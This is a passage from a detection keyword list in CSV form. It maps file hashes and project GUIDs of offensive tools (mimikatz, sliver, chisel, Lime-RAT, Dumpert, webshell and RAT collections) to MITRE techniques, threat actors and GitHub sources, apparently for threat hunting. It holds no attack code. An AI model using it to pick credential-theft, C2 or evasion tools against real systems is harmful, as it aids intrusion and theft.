"*93308034f5c3b6c30fa3251382e31f270606f94cb81bcb028edb7d68cd87e73c*",".{0,1000}93308034f5c3b6c30fa3251382e31f270606f94cb81bcb028edb7d68cd87e73c.{0,1000}","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","0","#filehash","N/A","7","4","390","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z","31247"
"*93317a49d4e0065e7bfa8c751e5f5d86087ef4c09c4f5d883dd9d9a69871f95d*",".{0,1000}93317a49d4e0065e7bfa8c751e5f5d86087ef4c09c4f5d883dd9d9a69871f95d.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","31248"
"*93362035A00C104A84F3B17E7B499CD700000000020000000000000000000000C00A1281B535EF499*",".{0,1000}93362035A00C104A84F3B17E7B499CD700000000020000000000000000000000C00A1281B535EF499.{0,1000}","offensive_tool_keyword","BITSInject","A one-click tool to inject jobs into the BITS queue (Background Intelligent Transfer Service) allowing arbitrary program execution as the NT AUTHORITY/SYSTEM account","T1197","TA0004","N/A","N/A","Privilege Escalation","https://github.com/SafeBreach-Labs/BITSInject","1","0","#filehash","N/A","8","1","99","18","2019-08-24T22:02:12Z","2017-07-03T12:39:38Z","31249"
"*933a32bee8a72a28653b56cb9b013f67da6510d4ad10c21333a6e930d385fb82*",".{0,1000}933a32bee8a72a28653b56cb9b013f67da6510d4ad10c21333a6e930d385fb82.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","31250"
"*933f98396260d2400250b8bd4897ab13bf4399fa276fa1e20391a446da68b4cc*",".{0,1000}933f98396260d2400250b8bd4897ab13bf4399fa276fa1e20391a446da68b4cc.{0,1000}","offensive_tool_keyword","DitExplorer","Tool for viewing NTDS.dit","T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/trustedsec/DitExplorer","1","0","#filehash","N/A","10","2","155","13","2025-03-14T13:02:44Z","2025-02-12T15:54:04Z","31252"
"*9341205B-AEE0-483B-9A80-975C2084C3AE*",".{0,1000}9341205B\-AEE0\-483B\-9A80\-975C2084C3AE.{0,1000}","offensive_tool_keyword","C3","Framework designed for red teams to create and manage custom C2 (Command and Control) channels. Unlike traditional C2 frameworks that rely on typical communication methods like HTTP/S DNS or TCP -  C3 allows for the creation of non-traditional and esoteric C2 channels using platforms like Slack Dropbox GitHub OneDrive and more.","T1071 - T1102 - T1090 - T1573 - T1048","TA0011 - TA0002 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/WithSecureLabs/C3","1","0","#GUIDproject","N/A","9","10","1602","276","2023-03-04T20:32:13Z","2019-08-30T11:21:04Z","31253"
"*9348d115c278c8cdd93b04c7da312199c6c93c624812b77168fba9f77a3b6ecc*",".{0,1000}9348d115c278c8cdd93b04c7da312199c6c93c624812b77168fba9f77a3b6ecc.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","31254"
"*934cdd2196c8892b2587ae94b5ae02e3c51ebf73c4c91b43b081d8add9ea381a*",".{0,1000}934cdd2196c8892b2587ae94b5ae02e3c51ebf73c4c91b43b081d8add9ea381a.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","31255"
"*93520c6aabfdb463c5b74b0409356813b4222190b131664a8343ca0b1b4e7d29*",".{0,1000}93520c6aabfdb463c5b74b0409356813b4222190b131664a8343ca0b1b4e7d29.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","#filehash","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","31257"
"*93567450bfc7916e8468e4c6c0d1792195fe70e0138461f98c75ca6c5d2f76a1*",".{0,1000}93567450bfc7916e8468e4c6c0d1792195fe70e0138461f98c75ca6c5d2f76a1.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","31258"
"*935D33C5-62F1-40FE-8DB0-46B6E01342FB*",".{0,1000}935D33C5\-62F1\-40FE\-8DB0\-46B6E01342FB.{0,1000}","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1055 - T1059 - T1070","TA0006 - TA0005 - TA0008","N/A","EvilCorp* - APT20","Credential Access","https://github.com/GhostPack/KeeThief","1","0","#GUIDproject","N/A","10","10","944","154","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z","31260"
"*93642234b0a16f0af2ebc99eb13287ab9b518bc5784358ee7d8166d3ae254560*",".{0,1000}93642234b0a16f0af2ebc99eb13287ab9b518bc5784358ee7d8166d3ae254560.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","31261"
"*9372fc352f24f6f58fe28bd7d0ff4cdc3a384275c7ddd6f76c4fa40eea0a94b2*",".{0,1000}9372fc352f24f6f58fe28bd7d0ff4cdc3a384275c7ddd6f76c4fa40eea0a94b2.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","31262"
"*9374f1f361c8c664f4527cc9e43e277fddab0bfc032e254fec9b22405210f808*",".{0,1000}9374f1f361c8c664f4527cc9e43e277fddab0bfc032e254fec9b22405210f808.{0,1000}","offensive_tool_keyword","ShellPwnsh","Reverse Shell in Golang and PowerShell Fud","T1059.001 - T1573.002 - T1105","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/BlackShell256/ShellPwnsh","1","0","#filehash","N/A","9","10","9","6","2022-05-01T08:42:54Z","2022-04-28T01:26:08Z","31263"
"*9379882ba3635ecf7bbd140a313245e551acb1a702b1e5e514eb61bf76260a83*",".{0,1000}9379882ba3635ecf7bbd140a313245e551acb1a702b1e5e514eb61bf76260a83.{0,1000}","offensive_tool_keyword","SharpShares","Multithreaded C# .NET Assembly to enumerate accessible network shares in a domain","T1046 - T1135","TA0007 - TA0001","N/A","BlackSuit - Royal - BianLian - Fog","Discovery","https://github.com/mitchmoser/SharpShares","1","0","#filehash","N/A","10","4","351","49","2021-09-21T08:14:27Z","2020-09-25T22:35:57Z","31264"
"*937d40d109c7b0aa6246639a8f3d5893c6dd62dec94816b2cf5a0e89be2be325*",".{0,1000}937d40d109c7b0aa6246639a8f3d5893c6dd62dec94816b2cf5a0e89be2be325.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","31265"
"*9381458c6722bf9307b870bfe07388ed787f229e93d971287883d8d8e490bfff*",".{0,1000}9381458c6722bf9307b870bfe07388ed787f229e93d971287883d8d8e490bfff.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#filehash","N/A","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","31267"
"*9381458c6722bf9307b870bfe07388ed787f229e93d971287883d8d8e490bfff*",".{0,1000}9381458c6722bf9307b870bfe07388ed787f229e93d971287883d8d8e490bfff.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","31268"
"*93832ebdb2391eeda156e8b58a0a5af6ed3897b5d9a90b3d9e346a460f76dad8*",".{0,1000}93832ebdb2391eeda156e8b58a0a5af6ed3897b5d9a90b3d9e346a460f76dad8.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","31269"
"*938a94d61186b75496c550611419474deb34d8038db6e1034a8919cebc898781*",".{0,1000}938a94d61186b75496c550611419474deb34d8038db6e1034a8919cebc898781.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","31270"
"*938e42fe50266db91748e07d22a54e73c9d5d25d81b5d50e475f3fc6e09d1cb1*",".{0,1000}938e42fe50266db91748e07d22a54e73c9d5d25d81b5d50e475f3fc6e09d1cb1.{0,1000}","offensive_tool_keyword","mRemoteNG-Decrypt","Python script to decrypt passwords stored by mRemoteNG","T1555.003 - T1110.003 - T1003 - T1081","TA0006 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/kmahyyg/mremoteng-decrypt","1","0","#filehash","N/A","8","1","83","21","2022-10-29T16:02:26Z","2019-05-11T09:09:49Z","31271"
"*9399f2fe7c63989641f911a519930e9139ff4987c0bdaee56c25d68c4c64a63b*",".{0,1000}9399f2fe7c63989641f911a519930e9139ff4987c0bdaee56c25d68c4c64a63b.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","#filehash","N/A","10","10","961","141","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z","31272"
"*93a50251b09b5dfc88fa583099e0724815099269561ca070dc823b4dd0be536d*",".{0,1000}93a50251b09b5dfc88fa583099e0724815099269561ca070dc823b4dd0be536d.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","0","#filehash","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","31273"
"*93a9468ea39b4bb15148e4845593d36f0137c5a23de9045dc5596a302f873e16*",".{0,1000}93a9468ea39b4bb15148e4845593d36f0137c5a23de9045dc5596a302f873e16.{0,1000}","offensive_tool_keyword","Carseat","Python implementation of GhostPack Seatbelt situational awareness tool","T1012 - T1082 - T1087 - T1124 - T1217","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/0xthirteen/Carseat","1","0","#filehash","N/A","8","3","257","21","2024-11-12T19:37:38Z","2024-11-08T02:08:53Z","31274"
"*93ade5b0b20ac4c950f3610f96c9f76a8cab972e793ed6364a2f2276965690f8*",".{0,1000}93ade5b0b20ac4c950f3610f96c9f76a8cab972e793ed6364a2f2276965690f8.{0,1000}","offensive_tool_keyword","Dumpert","Dumpert. an LSASS memory dumper using direct system calls and API unhooking Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. This tool demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike. while not touching disk and evading AV/EDR monitored user-mode API calls.","T1055.011 - T1003 - T1562.001 - T1027","TA0005 - TA0006","N/A","Dispossessor","Credential Access","https://github.com/outflanknl/Dumpert","1","0","#filehash","Dispossessor samples","10","10","1523","246","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z","31276"
"*93b20a7961c9986baf181d1a1635b33b87735f75d046c6dcdd5d412a55832d6f*",".{0,1000}93b20a7961c9986baf181d1a1635b33b87735f75d046c6dcdd5d412a55832d6f.{0,1000}","offensive_tool_keyword","NetshHelperBeacon","DLL to load from Windows NetShell. Will pop calc and execute shellcode.","T1055 - T1218","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/outflanknl/NetshHelperBeacon","1","0","#filehash","N/A","10","2","179","36","2016-09-26T19:57:08Z","2016-09-26T12:52:02Z","31278"
"*93b7d9be5712edde42725cbe09bed22e9b0d64123d2f535fe6807823c2214710*",".{0,1000}93b7d9be5712edde42725cbe09bed22e9b0d64123d2f535fe6807823c2214710.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","31279"
"*93ba29924f9e4124a73302d5ec2da5f7891922d9420cb0ca8649b6e7a9e59894*",".{0,1000}93ba29924f9e4124a73302d5ec2da5f7891922d9420cb0ca8649b6e7a9e59894.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","31280"
"*93ba29924f9e4124a73302d5ec2da5f7891922d9420cb0ca8649b6e7a9e59894*",".{0,1000}93ba29924f9e4124a73302d5ec2da5f7891922d9420cb0ca8649b6e7a9e59894.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","31281"
"*93bd4c92a4470333efab88a00bfec4c3fc64318fc8ce0ffb9187ea54a9acf243*",".{0,1000}93bd4c92a4470333efab88a00bfec4c3fc64318fc8ce0ffb9187ea54a9acf243.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","31282"
"*93c574a4f1608cb5ecf7173e42d35c5a670c58c635e6a90252cd9a102d24e260*",".{0,1000}93c574a4f1608cb5ecf7173e42d35c5a670c58c635e6a90252cd9a102d24e260.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","31284"
"*93cbbd682b981bee01388710acf813b64db918b54b61039d3fe1e019dad077df*",".{0,1000}93cbbd682b981bee01388710acf813b64db918b54b61039d3fe1e019dad077df.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1068 - T1548.004 - T1611 - T1203 - T1059.004","TA0004 - TA0001 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/liamg/traitor","1","0","#linux #filehash","N/A","10","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","31286"
"*93d0d9ef1c1e2828b282ece1f3ce06624f1a27fca3d4a78e36fcaf672cf9c5b5*",".{0,1000}93d0d9ef1c1e2828b282ece1f3ce06624f1a27fca3d4a78e36fcaf672cf9c5b5.{0,1000}","offensive_tool_keyword","AV_Evasion_Tool","Undetectable Payload Generator Tool","T1027 - T1036 - T1059 - T1107","TA0005","N/A","N/A","Defense Evasion","https://github.com/1y0n/AV_Evasion_Tool","1","0","#filehash","N/A","10","10","2680","406","2023-12-08T07:38:06Z","2020-04-24T01:11:09Z","31287"
"*93d1405dfa8765ab3ec43d1912e65ae89b8b8d06ddbc570f8cae0ca46dbf5007*",".{0,1000}93d1405dfa8765ab3ec43d1912e65ae89b8b8d06ddbc570f8cae0ca46dbf5007.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","31288"
"*93d8276129ccc984a4063772029e8db9002dfd82028c24864b5767cd6c7ce17d*",".{0,1000}93d8276129ccc984a4063772029e8db9002dfd82028c24864b5767cd6c7ce17d.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","31289"
"*93df885410ce2b2ea1428127077bcf574e56838ce8ccf4ea410a1f120544f9b8*",".{0,1000}93df885410ce2b2ea1428127077bcf574e56838ce8ccf4ea410a1f120544f9b8.{0,1000}","offensive_tool_keyword","BackHAck","Backdoor Generator with C2 server - Linux & Windows - FUD AV .py .exe","T1090 - T1095 - T1008","TA0011","N/A","N/A","C2","https://github.com/AngelSecurityTeam/BackHAck","1","0","#filehash #linux","N/A","10","10","108","34","2020-03-25T21:30:47Z","2020-03-14T19:00:36Z","31290"
"*93e193e3081c5ac744e40c81c32992ef449c855752d8b10f6483a969950572a4*",".{0,1000}93e193e3081c5ac744e40c81c32992ef449c855752d8b10f6483a969950572a4.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","31291"
"*93eabc4b534f92a5532322bbcc461a04abbb0c32c3c4957c258fd77f451e3b52*",".{0,1000}93eabc4b534f92a5532322bbcc461a04abbb0c32c3c4957c258fd77f451e3b52.{0,1000}","offensive_tool_keyword","sish","An open source serveo/ngrok alternative. HTTP(S)/WS(S)/TCP Tunnels to localhost using only SSH","T1572 - T1090.002","TA0010 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antoniomika/sish","1","0","#filehash","N/A","10","10","4203","325","2025-04-10T20:04:08Z","2019-02-15T15:36:23Z","31292"
"*93f5019c2c7b3a946f3a137fa1754576400c126f24b424076c9801e8f67441fd*",".{0,1000}93f5019c2c7b3a946f3a137fa1754576400c126f24b424076c9801e8f67441fd.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","31293"
"*9402ba2248837d50c00f4a423ab23b384fa81b30e6a6cafb86e9cd73a643daeb*",".{0,1000}9402ba2248837d50c00f4a423ab23b384fa81b30e6a6cafb86e9cd73a643daeb.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","31296"
"*9404a903396f378796bc906ecab923f471cd6228c646cd13afe55948c414a4b2*",".{0,1000}9404a903396f378796bc906ecab923f471cd6228c646cd13afe55948c414a4b2.{0,1000}","offensive_tool_keyword","SharpShares","Multithreaded C# .NET Assembly to enumerate accessible network shares in a domain","T1046 - T1135","TA0007 - TA0001","N/A","BlackSuit - Royal - BianLian - Fog","Discovery","https://github.com/mitchmoser/SharpShares","1","0","#filehash","N/A","10","4","351","49","2021-09-21T08:14:27Z","2020-09-25T22:35:57Z","31297"
"*940B1177-2B8C-48A2-A8E7-BF4E8E80C60F*",".{0,1000}940B1177\-2B8C\-48A2\-A8E7\-BF4E8E80C60F.{0,1000}","offensive_tool_keyword","Cronos-Rootkit","Cronos is Windows 10/11 x64 ring 0 rootkit. Cronos is able to hide processes. protect and elevate them with token manipulation.","T1055 - T1078 - T1134 - T1562.001","TA0001 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/XaFF-XaFF/Cronos-Rootkit","1","0","#GUIDproject","N/A","N/A","9","899","186","2022-03-29T08:26:03Z","2021-08-25T08:54:45Z","31298"
"*9413f823738aee4917952e60bfeccae88c8d103829a9831f912aa87c6535577c*",".{0,1000}9413f823738aee4917952e60bfeccae88c8d103829a9831f912aa87c6535577c.{0,1000}","offensive_tool_keyword","File-Tunnel","Tunnel TCP connections through a file","T1071 - T1105 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/fiddyschmitt/File-Tunnel","1","0","#filehash","N/A","10","10","925","82","2025-04-19T15:06:09Z","2023-02-05T12:57:45Z","31301"
"*941adac8fd267646f962656ab473a044dde64d49a1f7cca2914eb8e70dccd5a1*",".{0,1000}941adac8fd267646f962656ab473a044dde64d49a1f7cca2914eb8e70dccd5a1.{0,1000}","offensive_tool_keyword","POC","CVE-2024-4367 poc exploitation","T1566","TA0042","N/A","N/A","Resource Development","https://github.com/rzte/pdf-exploit","1","0","#filehash","N/A","6","3","216","41","2024-07-19T03:04:41Z","2024-07-11T14:33:11Z","31304"
